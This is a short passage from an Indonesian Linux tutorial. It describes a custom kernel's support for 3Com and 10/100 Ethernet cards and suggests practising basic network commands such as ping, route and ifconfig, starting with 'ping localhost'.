kernel yang penulis buat mendukung load module dan net-work card untuk jenis 3Com dan Ethernet Card base 10/100.Mungkin pada versi yang akan datang penulis akan menyer-takan dukungan modul network card seperti untuk Realtek8193 dan NE2000 yang banyak di gunakan oleh network cardsaat ini. Tapi untuk sekedar latihan Anda bisa mencoba bebe-rapa perintah Linux yang sering digunakan di jaringan/networkseperti: ping, route, ifconf ig dan sebagainya. Coba lakukanperintah ping ke localhost seperti contoh berikut:

ping localhost

atau